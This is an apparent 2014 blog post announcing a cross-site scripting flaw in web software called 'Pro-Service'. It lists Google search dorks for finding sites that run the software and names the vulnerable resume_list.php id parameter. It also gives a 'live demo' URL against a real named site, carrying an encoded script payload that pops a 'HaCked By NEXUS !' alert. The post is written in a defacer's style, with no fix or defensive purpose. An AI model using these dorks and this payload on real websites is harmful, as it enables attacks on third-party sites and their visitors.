Saturday, 5 July 2014

Pro-Service - XSS Vulnerability

Dorks:
intext:"Pro-Service" inurl:"/resume_list.php?id="
intext:"Pro-Service"

Exploit:
/resume_list.php?id=

Live Demo:
http://www.staff.ge/resume_list.php?id=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

 NEXUS - Sharing Is Caring